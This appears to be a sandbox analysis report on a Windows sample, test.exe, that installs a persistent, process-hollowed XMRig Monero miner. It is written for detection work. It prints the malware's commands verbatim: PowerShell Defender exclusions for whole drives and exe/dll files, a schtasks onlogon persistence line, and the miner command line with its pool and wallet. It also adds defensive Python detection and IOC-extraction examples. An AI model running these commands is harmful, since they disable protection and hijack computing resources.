Analysis
max time kernel: 382s
max time network: 386s
platform: windows7_x64
resource: win7-20240729-en
resource tags: arch:x64 arch:x86 image:win7-20240729-en locale:en-us os:windows7-x64 system
submitted: 04/09/2024, 18:22
Static task: static1

Behavioral tasks (this page shows behavioral2, the win7-20240729-en run):
Task         Sample    Resource
behavioral1  test.exe  win10-20240404-en
behavioral2  test.exe  win7-20240729-en
behavioral3  test.exe  win10-20240404-en
behavioral4  test.exe  win10v2004-20240802-en
General
Target: test.exe
Size: 29.7MB
MD5: 531a4e282c420c64d7b545a9c4e0fb4d
SHA1: 998d298e9ff967bec6f03bf8e8e8f03b4b3728db
SHA256: 98ced6e951485c45ebdeda3bbc04bd2918867e0490900b39789d9b4637a7409c
SHA512: c1d8296e2ba1e1ca9e1860548b884414e2cde06c584c40a4306d248b9c9ccbbff7e55a717d742ea14cc849db41838cfa6feb7638d888c627ff95abcb13df6730
SSDEEP: 786432:k99QkndbvqJ6+eH57FU4hxLq54xTxyCuYWQzJ2Mbvn:i1nM8hHxPhxO5iTECuYWQzJ7bv
Malware Config
Signatures
XMRig Miner payload 20 IoCs
resource: 20 memory dumps of PID 2936 (svchost.exe), all covering 0x0000000140000000-0x0000000140786000
  behavioral2/memory/2936-<n>-0x0000000140000000-0x0000000140786000-memory.dmp
  with n = 51, 53, 46, 68, 66, 63, 61, 59, 57, 71, 74, 72, 70, 73, 55, 49, 75, 78, 79, 77
yara_rule: xmrig (all 20 dumps)
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid   Process
2896  powershell.exe
2920  powershell.exe
2500  powershell.exe
2876  powershell.exe
Executes dropped EXE 1 IoCs
pid   Process
2684  services64.exe

Loads dropped DLL 1 IoCs
pid   Process
2760  cmd.exe
Drops file in System32 directory 7 IoCs
description                   ioc                                                        Process
File created                  C:\Windows\system32\services64.exe                         conhost.exe
File opened for modification  C:\Windows\system32\services64.exe                         conhost.exe
File created                  C:\Windows\system32\Microsoft\Libs\WR64.sys                conhost.exe
File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe  (4 entries, one per powershell.exe instance)
Suspicious use of SetThreadContext 1 IoCs
description                                  pid   Process      procid_target
PID 2180 set thread context of 2936          2180  conhost.exe  46
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid   Process
2840  schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid   Process
2896  powershell.exe
2920  powershell.exe
2500  powershell.exe
2876  powershell.exe
2936  svchost.exe  (the remaining 60 entries, all PID 2936)
Suspicious use of AdjustPrivilegeToken 7 IoCs
description                   pid   Process
Token: SeDebugPrivilege       2896  powershell.exe
Token: SeDebugPrivilege       2920  powershell.exe
Token: SeDebugPrivilege       2180  conhost.exe
Token: SeDebugPrivilege       2500  powershell.exe
Token: SeDebugPrivilege       2876  powershell.exe
Token: SeLockMemoryPrivilege  2936  svchost.exe
Token: SeLockMemoryPrivilege  2936  svchost.exe
Suspicious use of WriteProcessMemory 54 IoCs
Identical entries are collapsed; "writes" is how many times the same source wrote to the same target. Target process names are taken from the process tree below.
source pid  source process   target pid  target process   procid_target  writes
1744        test.exe         2152        conhost.exe      29             4
2152        conhost.exe      2780        cmd.exe          30             3
2152        conhost.exe      2844        cmd.exe          32             3
2780        cmd.exe          2896        powershell.exe   34             3
2844        cmd.exe          2840        schtasks.exe     35             3
2780        cmd.exe          2920        powershell.exe   36             3
2152        conhost.exe      2760        cmd.exe          37             3
2760        cmd.exe          2684        services64.exe   39             3
2684        services64.exe   2180        conhost.exe      40             4
2180        conhost.exe      1076        cmd.exe          41             3
1076        cmd.exe          2500        powershell.exe   43             3
1076        cmd.exe          2876        powershell.exe   45             3
2180        conhost.exe      2936        svchost.exe      46             16
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
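The signatures above describe three behaviours that translate directly into process-creation detections: Add-MpPreference exclusions covering whole drives and the exe/dll extensions, a schtasks /create with /sc onlogon and /rl highest, and an svchost.exe that is spawned by conhost.exe (after SetThreadContext and 16 WriteProcessMemory calls) with miner arguments instead of a -k service group. The Python below is an added example, not part of this sandbox report or of the sample; it runs such rules over a constructed, Sysmon-Event-1-like list of events built from the PIDs and command lines in this report, plus one benign svchost.exe control. The event field names and rule names are assumptions.

```python
"""Process-creation rules for the behaviours seen in the report: Defender
exclusion tampering, onlogon/highest scheduled task, and a miner running
inside an svchost.exe that was spawned by conhost.exe."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str         # full path of the new process
    parent_image: str  # full path of its parent
    cmdline: str


SYS32 = r"C:\Windows\System32"
PS = SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe"
DEFENDER_CMD = ('powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,'
                '$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"')
EXT_CMD = 'powershell -Command "Add-MpPreference -ExclusionExtension @(\'exe\',\'dll\') -Force"'

# Constructed sample events: PIDs, images and command lines copied from the
# behavioral2 process tree in this report; the last event is a benign control.
EVENTS = [
    ProcEvent(2152, SYS32 + r"\conhost.exe", r"C:\Users\Admin\AppData\Local\Temp\test.exe",
              f'"{SYS32}\\conhost.exe" "C:\\Users\\Admin\\AppData\\Local\\Temp\\test.exe"'),
    ProcEvent(2780, SYS32 + r"\cmd.exe", SYS32 + r"\conhost.exe",
              f"cmd /c {DEFENDER_CMD} & {EXT_CMD} & exit"),
    ProcEvent(2896, PS, SYS32 + r"\cmd.exe", DEFENDER_CMD),
    ProcEvent(2920, PS, SYS32 + r"\cmd.exe", EXT_CMD),
    ProcEvent(2840, SYS32 + r"\schtasks.exe", SYS32 + r"\cmd.exe",
              'schtasks /create /f /sc onlogon /rl highest /tn "services64" '
              '/tr "C:\\Windows\\system32\\services64.exe"'),
    ProcEvent(2936, SYS32 + r"\svchost.exe", SYS32 + r"\conhost.exe",
              'C:\\Windows/System32\\svchost.exe --cinit-find-x -B --algo="rx/0" --randomx-mode=auto '
              '--url=pool.hashvault.pro:3333 --cpu-max-threads-hint=60 --tls --cinit-stealth'),
    ProcEvent(900, SYS32 + r"\svchost.exe", SYS32 + r"\services.exe",   # benign control
              "C:\\Windows\\System32\\svchost.exe -k netsvcs -p -s Schedule"),
]

# Exclusion roots broad enough to blind Defender to almost everything.
BROAD_ROOTS = ("$env:systemdrive", "$env:systemroot", "$env:homedrive",
               "$env:userprofile", "$env:temp", "$env:appdata")
# Two or more of these on one command line is an XMRig-style invocation.
MINER_ARGS = ("--algo=", "--url=", "--randomx-", "--cpu-max-threads-hint",
              "--donate-level", "--cinit-", "rx/0")


def _base(path: str) -> str:
    """Lower-cased file name, tolerating the mixed \\ and / seen in the report."""
    return re.split(r"[\\/]", path)[-1].lower()


def evaluate(e: ProcEvent) -> list:
    """Return the names of every rule the event trips (empty list if benign)."""
    c = e.cmdline.lower()
    hits = []
    if "add-mppreference" in c:
        if "-exclusionpath" in c and any(r in c for r in BROAD_ROOTS):
            hits.append("defender_exclusion_broad_path")
        if "-exclusionextension" in c and re.search(r"'(exe|dll)'", c):
            hits.append("defender_exclusion_executable_ext")
    if _base(e.image) == "schtasks.exe" and "/create" in c \
            and "/sc onlogon" in c and "/rl highest" in c:
        hits.append("schtasks_onlogon_highest")
    if _base(e.image) == "svchost.exe":
        if _base(e.parent_image) != "services.exe":      # real service hosts come from services.exe
            hits.append("svchost_unexpected_parent")
        if not re.search(r"\s-k\s", c):                  # and always carry a -k service group
            hits.append("svchost_no_service_group")
    if sum(a in c for a in MINER_ARGS) >= 2:
        hits.append("xmrig_style_cmdline")
    if _base(e.parent_image) == "conhost.exe":           # conhost.exe has no legitimate children
        hits.append("conhost_spawned_child")
    if _base(e.image) == "conhost.exe" and re.search(r'\.exe"?\s*$', c) and c.count(".exe") >= 2:
        hits.append("conhost_exe_argument")              # conhost is normally passed a handle, not an exe
    return hits


def detect(events) -> list:
    """(pid, rule) pairs for every rule hit across the event list."""
    return [(e.pid, rule) for e in events for rule in evaluate(e)]


def pids_by_rule(findings) -> dict:
    out = {}
    for pid, rule in findings:
        out.setdefault(rule, set()).add(pid)
    return out


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

Add-MpPreference only succeeds from an elevated context, so pair the exclusion rules with the integrity level of the PowerShell process to know whether the exclusions actually took effect; in this run the same two commands are issued twice, once under the original test.exe and again under the persisted services64.exe copy.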
Processes
Nesting depth is shown in brackets; each entry lists the image, its full command line, its PID and the signatures that fired on it.

[1] C:\Users\Admin\AppData\Local\Temp\test.exe
    Command: "C:\Users\Admin\AppData\Local\Temp\test.exe"
    PID: 1744
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\conhost.exe
      Command: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\test.exe"
      PID: 2152
      - Drops file in System32 directory
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\cmd.exe
        Command: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        PID: 2780
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          PID: 2896
          - Command and Scripting Interpreter: PowerShell
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          PID: 2920
          - Command and Scripting Interpreter: PowerShell
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\cmd.exe
        Command: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        PID: 2844
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\schtasks.exe
          Command: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          PID: 2840
          - Scheduled Task/Job: Scheduled Task

    [3] C:\Windows\System32\cmd.exe
        Command: "cmd" cmd /c "C:\Windows\system32\services64.exe"
        PID: 2760
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\services64.exe
          Command: C:\Windows\system32\services64.exe
          PID: 2684
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\System32\conhost.exe
            Command: "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
            PID: 2180
            - Drops file in System32 directory
            - Suspicious use of SetThreadContext
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\System32\cmd.exe
              Command: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              PID: 1076
              - Suspicious use of WriteProcessMemory

            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                PID: 2500
                - Command and Scripting Interpreter: PowerShell
                - Drops file in System32 directory
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                PID: 2876
                - Command and Scripting Interpreter: PowerShell
                - Drops file in System32 directory
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

          [6] C:\Windows\System32\svchost.exe
              Command: C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:3333 --user=47nUe8D3z4bjgwqG9v4tKY3sBMcoEdvQ3iJMC8A8udU7DngaeR7hNhKETaaQD1iWhadw6j9iNWqf6fKiVcMy35kdVbxAzyD --pass= --cpu-max-threads-hint=60 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
              PID: 2936
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
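The svchost.exe command line at depth 6 is an XMRig invocation (--algo, --url, --user, --randomx-*, --cpu-max-threads-hint and --tls are upstream XMRig options); the --cinit-* options are not upstream XMRig flags and mark a modified build with its own idle-only and process-stealth settings. The 20 xmrig YARA hits in the memory dumps of PID 2936 all cover 0x140000000-0x140786000, the default image base of a 64-bit PE, consistent with the miner image being mapped into the svchost.exe that conhost.exe (PID 2180) set up with SetThreadContext and WriteProcessMemory; SeLockMemoryPrivilege on PID 2936 is the privilege a miner needs for large-page allocation. The Python below is an added example, not from the report or the sample, that extracts the pool, wallet, algorithm and custom-build options from that command line and checks the wallet against the standard Monero address format. The output field names and the address regex are assumptions.

```python
"""Pull the mining IOCs out of the hollowed svchost.exe command line."""
import re

# Command line copied verbatim from the behavioral2 process tree above (PID 2936).
MINER_CMDLINE = (
    'C:\\Windows/System32\\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto '
    '--cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 '
    '--cuda-bsleep-hint=100 --url=pool.hashvault.pro:3333 '
    '--user=47nUe8D3z4bjgwqG9v4tKY3sBMcoEdvQ3iJMC8A8udU7DngaeR7hNhKETaaQD1iWhadw6j9iNWqf6fKiVcMy35kdVbxAzyD '
    '--pass= --cpu-max-threads-hint=60 '
    '--cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" '
    '--cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth'
)

# Standard Monero address: leading '4' (main address) or '8' (subaddress) plus
# 94 base58 characters; base58 omits 0, O, I and l.
XMR_ADDRESS = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
SCHEME = re.compile(r"^[a-z+]+://")   # strips stratum+tcp:// and similar prefixes


def parse_args(cmdline: str) -> dict:
    """Map each option to its value ('' for --pass=, True for bare flags such as --tls).
    Whitespace splitting is enough here because no quoted value contains a space."""
    opts = {}
    for tok in cmdline.split()[1:]:          # [0] is the executable path
        if not tok.startswith("-"):
            continue
        key, sep, val = tok.partition("=")   # split at the first '=' only; base64 may contain '='
        opts[key] = val.strip('"') if sep else True
    return opts


def extract_iocs(cmdline: str) -> dict:
    """Network and wallet IOCs plus the evasion-related options of the build."""
    o = parse_args(cmdline)
    url = SCHEME.sub("", o.get("--url", ""))
    host, _, port = url.rpartition(":")
    wallet = o.get("--user", "")
    return {
        "pool_host": host or url,
        "pool_port": int(port) if port.isdigit() else None,
        "tls": o.get("--tls") is True,
        "background": "-B" in o,
        "algo": o.get("--algo"),
        "pool_password": o.get("--pass"),
        "wallet": wallet,
        "wallet_is_monero_format": bool(XMR_ADDRESS.match(wallet)),
        "cpu_threads_hint": int(o["--cpu-max-threads-hint"]) if "--cpu-max-threads-hint" in o else None,
        # Not upstream XMRig options: they identify a modified build and carry its
        # evasion settings (mine only when the host is idle, encoded stealth target list).
        "custom_build_options": sorted(k for k in o if k.startswith("--cinit-")),
        "idle_cpu_threshold": o.get("--cinit-idle-cpu"),
        "stealth_targets_blob": o.get("--cinit-stealth-targets"),
    }


if __name__ == "__main__":
    for key, value in extract_iocs(MINER_CMDLINE).items():
        print(f"{key}: {value}")
```

The pool host and port, the wallet and the TLS flag are the values to pivot on: the wallet is the most stable identifier across samples from the same operator, while the --cinit-stealth-targets blob is left as opaque data because the page gives no key or format for it.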
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: c0a6f6bb3487857aa6d4ea1126dd4d7d
SHA1: 7f184822523affb719c86244b31e8f5033fed4e4
SHA256: 15aae6fdafb11c79efb48f0f1c99a3eba18b9f2d102428e461cf97370afe91d2
SHA512: b4b34cfedd78c2e7c3d7e23b8df7737c92967f3b6db3267bf99300d664ed6c5f2f81a1cc7b88d346fa3e70e8c479bd7191958df5567a2c3fbc178be622c46e2d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UAM7L4YUYL2ULU9MSRDY.temp
Filesize: 7KB
MD5: b094557184777f3f6d900edb010357d7
SHA1: deb155fb4902abe7dbe76d39b53c4e4df551d6ea
SHA256: 68bc416ac93515c602e009d39d0f9530da41d1cd004d522d804bf2d1466a7195
SHA512: 3364e8f0f7dc40d9dd0e6f775caab0211b046ba152325819c2bf6361d228d8c80dddf15c7df0fcc9d6ee158edcd14a542c7a81343d995532923338261c3e2b96

Submitted sample (hashes match the Target in General above)
Filesize: 29.7MB
MD5: 531a4e282c420c64d7b545a9c4e0fb4d
SHA1: 998d298e9ff967bec6f03bf8e8e8f03b4b3728db
SHA256: 98ced6e951485c45ebdeda3bbc04bd2918867e0490900b39789d9b4637a7409c
SHA512: c1d8296e2ba1e1ca9e1860548b884414e2cde06c584c40a4306d248b9c9ccbbff7e55a717d742ea14cc849db41838cfa6feb7638d888c627ff95abcb13df6730